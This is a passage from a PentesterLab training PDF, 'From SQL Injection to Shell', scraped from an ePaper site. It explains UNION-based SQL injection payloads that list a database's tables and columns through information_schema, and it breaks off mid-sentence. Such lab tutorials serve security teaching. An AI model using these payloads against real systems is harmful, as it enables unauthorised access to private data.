from_sqli_to_shell
from_sqli_to_shell
from_sqli_to_shell
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
PentesterLab.com » From SQL Injection <strong>to</strong> Shell<br />
the list of all tables: SELECT table_name FROM<br />
information_schema.tables<br />
the list of all columns: SELECT column_name FROM<br />
information_schema.columns<br />
By mixing these queries and the previous URL, you can guess what page <strong>to</strong> access<br />
<strong>to</strong> retrieve information:<br />
the list of tables: 1 UNION SELECT 1,table_name,3,4 FROM<br />
information_schema.tables<br />
the list of columns: 1 UNION SELECT 1,column_name,3,4 FROM<br />
information_schema.columns<br />
The problem, is that these requests provide you a raw list of all tables and columns,<br />
but <strong>to</strong> query the database and retrieve interesting information, you will need <strong>to</strong> know<br />
what column belongs <strong>to</strong> what table. Hopefully, the table<br />
information_schema.columns s<strong>to</strong>res table names:<br />
SELECT table_name,column_name FROM information_schema.columns<br />
To retrieve this information, we can either<br />
29/41